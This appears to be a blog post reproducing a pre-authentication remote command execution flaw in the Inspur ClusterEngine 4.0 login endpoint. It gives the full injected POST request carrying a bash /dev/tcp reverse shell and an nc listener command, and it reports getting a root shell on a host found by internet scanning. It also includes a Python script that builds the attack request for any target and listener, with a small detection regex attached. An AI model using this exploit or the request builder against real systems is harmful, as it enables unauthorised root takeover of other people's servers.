# Inspur ClusterEngine 4.0 Cluster Management System Pre-auth RCE
While I was slacking off yet again, 空白 (crazygod) sent over the payload for the Inspur ClusterEngine 4.0 cluster management system pre-auth RCE. Oh? Then I had no choice but to go reproduce it. No sooner said than done: a quick round of fofa searching.
Payload:

```http
POST /login
op=login&username=1 2\',\'1\'\); `bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{reverse shell IP}%2F80%200%3E%261`
```
I tried a few sites and the capture failed on every one of them; presumably they had been patched, since the moment I intercepted the request the server connection failed. With my temper, I just went straight to the next one, until I finally reached one where the request could be captured.
First start a listener on the VPS: `nc -lvp 3344`

Then go to the login page, capture the login request, build the payload, and go.

The POST request is as follows:
```http
POST /login HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 103
Origin: https://ip
Connection: close
Referer: https://ip/module/login/login.html
Cookie: lang=cn

op=login&username=1%202\',\'1\'\);`bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F***.**.**.***%2F3344%200%3E%261`
```
Sent the request, and the listener received a shell with root privileges.
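As an added example (my own script, not code from the post or from 空白's payload), the following Python assembles the login body from a listener IP and port exactly the way the request above is encoded (only the command inside the backticks is percent-encoded; the prefix and the backticks are sent raw), decodes it the way the server side would see it, and flags the shell-injection markers a WAF or request-log rule would look for. The host, IP and port are placeholders; the post does not explain why the `1 2\',\'1\'\);` prefix is needed, and this script does not claim to either.

```python
"""Build, decode and flag the ClusterEngine 4.0 login payload from the post."""
import re
from urllib.parse import quote, unquote

# Reverse shell that the post injects inside backticks (IP/port are placeholders).
REVERSE_SHELL = "bash -i >& /dev/tcp/{ip}/{port} 0>&1"

# Prefix before the backticks, copied verbatim from the post (backslashes included).
# The post does not explain why the application treats it as a delimiter.
PREFIX = "1%202\\',\\'1\\'\\);"


def build_login_body(ip: str, port: int) -> str:
    """Return the x-www-form-urlencoded body for POST /login.

    Only the command inside the backticks is percent-encoded, matching the
    request in the post; the prefix and the backticks themselves go out raw.
    """
    cmd = REVERSE_SHELL.format(ip=ip, port=port)
    return f"op=login&username={PREFIX}`{quote(cmd, safe='')}`"


def build_raw_request(host: str, ip: str, port: int) -> str:
    """Assemble the raw HTTP/1.1 request for pasting into a repeater or netcat."""
    body = build_login_body(ip, port)
    headers = [
        "POST /login HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With: XMLHttpRequest",
        f"Content-Length: {len(body.encode())}",
        "Connection: close",
        "Cookie: lang=cn",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


def form_fields(body: str) -> dict:
    """Decode a form body the way the server would see it.

    Split on '&' only (the payload carries a raw ';'), then percent-decode.
    """
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote(key)] = unquote(value)
    return fields


# Markers of shell command injection in a decoded field value:
# backtick substitution, $(...) substitution, bash's /dev/tcp pseudo-device,
# and an interactive bash invocation.
INJECTION_RE = re.compile(r"`[^`]+`|\$\([^)]*\)|/dev/tcp/|\bbash\s+-i\b")


def flags_command_injection(body: str) -> bool:
    """True if any decoded field of the login body carries a shell-injection marker."""
    return any(INJECTION_RE.search(v) for v in form_fields(body).values())


if __name__ == "__main__":
    # Constructed placeholders; replace with your own listener when reproducing.
    print(build_raw_request("target.example", "10.0.0.1", 3344))
    print("flagged:", flags_command_injection(build_login_body("10.0.0.1", 3344)))
```

For a listener on 10.0.0.1:3344 the body produced by `build_login_body` matches the post's request character for character apart from the IP, and `form_fields` shows what the application actually receives: a `username` value ending in a backtick-wrapped `bash -i >& /dev/tcp/... 0>&1`. `flags_command_injection` is the defender's side of the same string and is deliberately run on the decoded value, since the raw body hides `>`, `&` and `/` behind percent-encoding.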
As for the root cause, I don't really understand it myself; something in there leads to command execution. I haven't looked at the source code either, so we'll have to wait for 空白 to walk us through the analysis.